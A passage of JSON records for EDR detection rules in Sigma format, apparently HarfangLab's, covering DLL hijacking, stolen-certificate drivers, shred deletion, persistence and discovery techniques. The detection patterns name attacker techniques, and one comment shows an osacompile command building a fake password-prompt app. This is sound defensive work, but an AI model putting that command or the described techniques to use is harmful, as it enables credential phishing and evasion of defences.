classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'klist.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbghelp.dll'\n - '\\netutils.dll'\n - '\\secur32.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0cf16516-206d-4746-b55e-291542898e67", + "rule_name": "DLL Hijacking via klist.exe", + "rule_description": "Detects potential Windows DLL Hijacking via klist.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": 
"0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0d1a3edd-eeb6-4a1c-8c08-047b57bbe2d8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.079072Z", + "creation_date": "2026-03-23T11:45:34.079074Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.079079Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://blog.malwarebytes.com/awareness/2022/03/stolen-nvidia-certificates-used-to-sign-malware-heres-what-to-do/", + "https://attack.mitre.org/techniques/T1553/002/" + ], + "name": "t1553_002_nvidia_stolen_cert_driver_load.yml", + "content": "title: Driver Loaded Signed with NVIDIA Stolen Certificate\nid: 0d1a3edd-eeb6-4a1c-8c08-047b57bbe2d8\ndescription: |\n Detects the loading of driver signed using one of NVIDIA's stolen certificates.\n This can be the sign of a malware using a fake signature to evade AV/EDR detection.\n It is recommended to find the process responsible for this action using the related timeline or through jobs, as well as to analyze the loaded driver to look for malicious content and actions.\nreferences:\n - 
https://blog.malwarebytes.com/awareness/2022/03/stolen-nvidia-certificates-used-to-sign-malware-heres-what-to-do/\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2022/07/12\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Behavior.StolenCertificate\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: driver_load\ndetection:\n selection_cert_1:\n DriverSignatureSignerThumbprint: '579aec4489a2ca8a2a09df5dc0323634bd8b16b7'\n\n filter_timestamp_cert_1:\n DriverPETimestampStr|startswith:\n - '2011-'\n - '2012-'\n - '2013-'\n - '2014-01'\n - '2014-02'\n - '2014-03'\n - '2014-04'\n - '2014-05'\n - '2014-06'\n - '2014-07'\n - '2014-08'\n\n selection_cert_2:\n DriverSignatureSignerThumbprint: '30632ea310114105969d0bda28fdce267104754f'\n\n filter_timestamp_cert_2:\n DriverPETimestampStr|startswith:\n - '2015-07'\n - '2015-08'\n - '2015-09'\n - '2015-10'\n - '2015-11'\n - '2015-12'\n - '2016-'\n - '2017-'\n - '2018-01'\n - '2018-02'\n - '2018-03'\n - '2018-04'\n - '2018-05'\n - '2018-06'\n - '2018-07'\n\n filter_copyright:\n LegalCopyright|contains:\n - 'NVIDIA'\n - 'Galasoft'\n\n condition: ((selection_cert_1 and not filter_timestamp_cert_1) or (selection_cert_2 and not filter_timestamp_cert_2)) and not filter_copyright\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0d1a3edd-eeb6-4a1c-8c08-047b57bbe2d8", + "rule_name": "Driver Loaded Signed with NVIDIA Stolen Certificate", + "rule_description": "Detects the loading of driver signed using one of NVIDIA's stolen certificates.\nThis can be the sign of a malware using a fake signature to evade AV/EDR detection.\nIt is recommended to find the process responsible for this action using the related timeline or through jobs, as well as to analyze the loaded driver to look for 
malicious content and actions.\n", + "rule_creation_date": "2022-07-12", + "rule_modified_date": "2025-02-04", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1553.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0d4bd1c5-18a6-4c6e-a08e-48adc41e2884", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.628455Z", + "creation_date": "2026-03-23T11:45:34.628457Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.628462Z", + "rule_level": "medium", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://man7.org/linux/man-pages/man1/shred.1.html", + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md#atomic-test-3---overwrite-and-delete-a-file-with-shred", + "https://attack.mitre.org/techniques/T1070/004/", + "https://attack.mitre.org/techniques/T1485/" + ], + "name": "t1070_004_delete_with_shred.yml", + "content": "title: File Deleted via shred\nid: 0d4bd1c5-18a6-4c6e-a08e-48adc41e2884\ndescription: |\n Detects the execution of 
shred, a tool used to overwrite a file's content before deleting it.\n Attackers can overwrite any files left by their malicious activities to prevent forensic and slow the investigation, or use shred to destroy sensitive information as part of a ransomware attack.\n It is recommended to investigate the parent process as well as the files being deleted to determine whether this action was legitimate.\nreferences:\n - https://man7.org/linux/man-pages/man1/shred.1.html\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md#atomic-test-3---overwrite-and-delete-a-file-with-shred\n - https://attack.mitre.org/techniques/T1070/004/\n - https://attack.mitre.org/techniques/T1485/\ndate: 2023/01/06\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.004\n - attack.impact\n - attack.t1485\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Shred\n - classification.Linux.Behavior.Deletion\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/shred'\n CommandLine|contains:\n - ' -u'\n - ' -?u'\n - ' -??u'\n - ' -???u'\n\n exclusion_space:\n CommandLine|contains:\n - ' - u'\n - ' -? u'\n - ' -?? 
u'\n\n exclusion_plz_sandbox:\n ParentCommandLine: '/tmp/plz_sandbox/third_party/system_tools/logrotate/logrotate -v -m ./mailer -s state test-config.15 --force'\n\n exclusion_blacknoise:\n ParentCommandLine: 'sudo -S shred -u /tmp/blacknoise_BLCKNS_DEF_L0007.001'\n\n exclusion_logrotate:\n ParentCommandLine: '/usr/sbin/logrotate /etc/logrotate.conf'\n CommandLine: 'shred -u -'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0d4bd1c5-18a6-4c6e-a08e-48adc41e2884", + "rule_name": "File Deleted via shred", + "rule_description": "Detects the execution of shred, a tool used to overwrite a file's content before deleting it.\nAttackers can overwrite any files left by their malicious activities to prevent forensic and slow the investigation, or use shred to destroy sensitive information as part of a ransomware attack.\nIt is recommended to investigate the parent process as well as the files being deleted to determine whether this action was legitimate.\n", + "rule_creation_date": "2023-01-06", + "rule_modified_date": "2026-02-11", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.impact" + ], + "rule_technique_tags": [ + "attack.t1070.004", + "attack.t1485" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0d4ebd0c-1c3f-4c6b-8c60-121639f8b842", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": 
true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.595420Z", + "creation_date": "2026-03-23T11:45:34.595423Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.595431Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.intrinsec.com/apt27-analysis/", + "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html", + "https://attack.mitre.org/techniques/T1106/" + ], + "name": "t1106_apt27_named_pipe_connection.yml", + "content": "title: Suspicious APT27 Related Named Pipe Connected\nid: 0d4ebd0c-1c3f-4c6b-8c60-121639f8b842\ndescription: |\n Detects the creation or connection of/to a Named Pipe named \"testPipe\".\n The name is related to the APT27 threat, more specifically their HyperBro malware.\n It is recommended to verify that this is a legitimate developer pipe.\nreferences:\n - https://www.intrinsec.com/apt27-analysis/\n - https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html\n - https://attack.mitre.org/techniques/T1106/\ndate: 2022/10/26\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1106\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.ThreatActor.APT27\n - classification.Windows.Malware.HyperBro\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n PipeName: '\\testPipe'\n\n exclusion_hellodoc:\n ProcessImage|endswith:\n - '\\IMAGINE Editions\\HelloDoc\\HelloDoc.exe'\n - 
'\\imagine editions\\hellodoc\\HelloDoc Acces Vidal.exe'\n ProcessSigned: 'true'\n\n condition: selection and not 1 of exclusion_*\nfalsepositives:\n - Legitimate developer creation of a named pipe called \"testPipe\"\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0d4ebd0c-1c3f-4c6b-8c60-121639f8b842", + "rule_name": "Suspicious APT27 Related Named Pipe Connected", + "rule_description": "Detects the creation or connection of/to a Named Pipe named \"testPipe\".\nThe name is related to the APT27 threat, more specifically their HyperBro malware.\nIt is recommended to verify that this is a legitimate developer pipe.\n", + "rule_creation_date": "2022-10-26", + "rule_modified_date": "2025-04-14", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1106", + "attack.t1559" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0d51dffe-a29c-4bbf-a33a-b2308e77bfda", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.085080Z", + "creation_date": "2026-03-23T11:45:34.085082Z", + "enabled": 
true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.085086Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/persistence-info/persistence-info.github.io/blob/main/Data/recyclebin.md", + "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/", + "https://attack.mitre.org/techniques/T1546/015/" + ], + "name": "t1546_015_recycle_bin_persistence.yml", + "content": "title: Recycle Bin COM Object Modified\nid: 0d51dffe-a29c-4bbf-a33a-b2308e77bfda\ndescription: |\n Detects the creation of the subkey \"\\shell\\open\\command\" under the Recycle Bin ClassID in the registry.\n The Windows Registry uses ClassID subkeys to define shell actions for system folders and objects. The Recycle Bin has a specific ClassID ({645FF040-5081-101B-9F08-00AA002F954E}) that can be modified with a \"\\shell\\open\\command\" subkey to override the default open action.\n When this subkey is created or modified under the Recycle Bin's ClassID, it redirects the default open action to execute a custom command.\n Attackers exploit this mechanism to achieve persistence by ensuring their malicious code runs whenever a user attempts to access the Recycle Bin through Windows Explorer or other file management operations.\n It is recommended to verify whether the registry modification is legitimate and analyze the command specified in the modified registry key to determine if it points to malicious executables or scripts.\nreferences:\n - https://github.com/persistence-info/persistence-info.github.io/blob/main/Data/recyclebin.md\n - https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/\n - https://attack.mitre.org/techniques/T1546/015/\ndate: 2025/04/24\nmodified: 2025/10/02\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1546.015\n - attack.t1112\n - classification.Windows.Source.Registry\n - 
classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'CreateKey'\n TargetObject|endswith: '\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell\\open\\command'\n\n condition: selection\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0d51dffe-a29c-4bbf-a33a-b2308e77bfda", + "rule_name": "Recycle Bin COM Object Modified", + "rule_description": "Detects the creation of the subkey \"\\shell\\open\\command\" under the Recycle Bin ClassID in the registry.\nThe Windows Registry uses ClassID subkeys to define shell actions for system folders and objects. The Recycle Bin has a specific ClassID ({645FF040-5081-101B-9F08-00AA002F954E}) that can be modified with a \"\\shell\\open\\command\" subkey to override the default open action.\nWhen this subkey is created or modified under the Recycle Bin's ClassID, it redirects the default open action to execute a custom command.\nAttackers exploit this mechanism to achieve persistence by ensuring their malicious code runs whenever a user attempts to access the Recycle Bin through Windows Explorer or other file management operations.\nIt is recommended to verify whether the registry modification is legitimate and analyze the command specified in the modified registry key to determine if it points to malicious executables or scripts.\n", + "rule_creation_date": "2025-04-24", + "rule_modified_date": "2025-10-02", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1112", + "attack.t1546.015" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": 
"0d55020f-bbfc-470c-addf-f5feb6e37098", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.609954Z", + "creation_date": "2026-03-23T11:45:34.609967Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.609975Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://attack.mitre.org/techniques/T1068/" + ], + "name": "t1068_registry_unprivileged_user_modifying_service_registry_config.yml", + "content": "title: Service Registry Configuration Modified by an Unprivileged User\nid: 0d55020f-bbfc-470c-addf-f5feb6e37098\ndescription: |\n Detects a service registry configuration modification by an unprivileged user.\n Attackers can use registry permission weaknesses to perform privilege escalation by modifying a privileged service configuration in the registry.\n It is recommended to investigate the modified registry key to look for paths pointing to malicious content.\nreferences:\n - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n - https://attack.mitre.org/techniques/T1068/\ndate: 
2022/09/07\nmodified: 2025/02/11\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - attack.persistence\n - attack.t1574.011\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n ProcessIntegrityLevel:\n - 'Low'\n - 'Medium'\n TargetObject:\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\\\*\\ImagePath'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\\\*\\FailureCommand'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\\\*\\ServiceDll'\n\n exclusion_novell:\n # \\??\\C:\\Program Files\\Novell\\Client\\XTier\\Drivers\\nccache.sys\n Details|contains: ':\\Program Files\\Novell\\Client\\XTier\\Drivers\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0d55020f-bbfc-470c-addf-f5feb6e37098", + "rule_name": "Service Registry Configuration Modified by an Unprivileged User", + "rule_description": "Detects a service registry configuration modification by an unprivileged user.\nAttackers can use registry permission weaknesses to perform privilege escalation by modifying a privileged service configuration in the registry.\nIt is recommended to investigate the modified registry key to look for paths pointing to malicious content.\n", + "rule_creation_date": "2022-09-07", + "rule_modified_date": "2025-02-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1068", + "attack.t1574.011" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": 
"0d5af151-1912-4b7d-aa38-cacd25e43f67", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "low", + "rule_effective_confidence": "weak", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:35.296528Z", + "creation_date": "2026-03-23T11:45:35.296531Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:35.296535Z", + "rule_level": "low", + "rule_confidence": "weak", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1007/" + ], + "name": "t1007_net_start.yml", + "content": "title: System Service Discovered via net.exe\nid: 0d5af151-1912-4b7d-aa38-cacd25e43f67\ndescription: |\n Detects the execution of net1.exe with start option.\n Adversaries can use this command during discovery phase to enumerate started system services.\n It is recommended to investigate the parent process to look for malicious content or other malicious actions.\nreferences:\n - https://attack.mitre.org/techniques/T1007/\ndate: 2022/11/14\nmodified: 2026/02/20\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1007\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 
'net1.exe'\n\n selection_commandline:\n CommandLine|endswith: ' start'\n CurrentDirectory|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\\\?Recycle.Bin\\'\n\n exclusion_programfiles:\n - GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - Ancestors|startswith:\n - '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Program Files\\'\n - '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Program Files (x86)\\'\n\n exclusion_incotec:\n # https://www.incotec-software.com/\n - CurrentDirectory|contains: '\\Incotec\\Exec\\Bin'\n - Ancestors|contains: '|?:\\Incotec\\UNIX\\bin\\sh.exe|'\n\n exclusion_syracuse:\n - CurrentDirectory|endswith: '\\syracuse\\agent\\'\n - Ancestors|endswith: '\\syracuse\\agent\\Agent.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_egurkha:\n CommandLine: '?:\\Windows\\system32\\net1 start'\n Ancestors|startswith: '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Program Files\\eGurkha\\JRE\\bin\\java.exe|'\n\n exclusion_scripts:\n GrandparentCommandLine:\n - '?:\\Windows\\SYSTEM32\\cmd.exe /c ?:\\\\*.bat'\n - '?:\\Windows\\SYSTEM32\\cmd.exe /c ?:\\\\*.cmd'\n Ancestors:\n - '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n - '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\taskeng.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_oracle:\n GrandparentCommandLine:\n - 'cmd.exe /x/d/c net start | find oracle /i'\n - 'cmd.exe /x/d/c net start | find oracleservice /i'\n Ancestors|contains: '|?:\\Perl64\\bin\\perl.exe|?:\\Windows\\System32\\cmd.exe|'\n\n exclusion_datto:\n Ancestors: 
'?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Program Files (x86)\\CentraStage\\CagService.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_hexaflux:\n GrandparentCommandLine: '?:\\Windows\\system32\\cmd.exe /d /s /c net start | findstr Hexaflux'\n Ancestors|endswith: '\\hexaflux\\admin\\\\*|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|?:\\Program Files (x86)\\SAM\\RollCallSuite\\RollProxyConfigurator.exe|'\n - '|?:\\Program Files\\Dell\\SysMgt\\cm\\invcol\\invCol.exe|'\n - '|?:\\eGurkha\\JRE\\bin\\java.exe|'\n\n exclusion_ccmcache:\n CurrentDirectory|startswith: '?:\\Windows\\ccmcache\\'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0d5af151-1912-4b7d-aa38-cacd25e43f67", + "rule_name": "System Service Discovered via net.exe", + "rule_description": "Detects the execution of net1.exe with start option.\nAdversaries can use this command during discovery phase to enumerate started system services.\nIt is recommended to investigate the parent process to look for malicious content or other malicious actions.\n", + "rule_creation_date": "2022-11-14", + "rule_modified_date": "2026-02-20", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.discovery" + ], + "rule_technique_tags": [ + "attack.t1007" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0e0dad90-5301-41c4-a880-808713de6f5d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": 
"0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.618007Z", + "creation_date": "2026-03-23T11:45:34.618009Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.618014Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.trendmicro.com/pl_pl/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html", + "https://attack.mitre.org/techniques/T1059/002/" + ], + "name": "t1059_002_osacompile_execution.yml", + "content": "title: Apple Script Compiled via Osacompile\nid: 0e0dad90-5301-41c4-a880-808713de6f5d\ndescription: |\n Detects the execution of osacompile to compile an Apple Script.\n This could be used by an attacker to hide malicious behaviour under a compiled app bundle (ADHOC code signed).\n It is recommended to investigate the program that triggered the compilation and what was compiled to determine whether this action was legitimate.\nreferences:\n - https://www.trendmicro.com/pl_pl/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html\n - https://attack.mitre.org/techniques/T1059/002/\ndate: 2022/11/14\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.Osascript\n - classification.macOS.LOLBin.Osacompile\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n 
# osacompile -e 'display dialog \"Password\" default answer \"\" with icon note buttons {\"Cancel\", \"Continue\"} default button \"Continue\"' -o MaliciousApp.app\n selection:\n Image: '/usr/bin/osacompile'\n\n condition: selection\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0e0dad90-5301-41c4-a880-808713de6f5d", + "rule_name": "Apple Script Compiled via Osacompile", + "rule_description": "Detects the execution of osacompile to compile an Apple Script.\nThis could be used by an attacker to hide malicious behaviour under a compiled app bundle (ADHOC code signed).\nIt is recommended to investigate the program that triggered the compilation and what was compiled to determine whether this action was legitimate.\n", + "rule_creation_date": "2022-11-14", + "rule_modified_date": "2025-01-20", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1569.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": 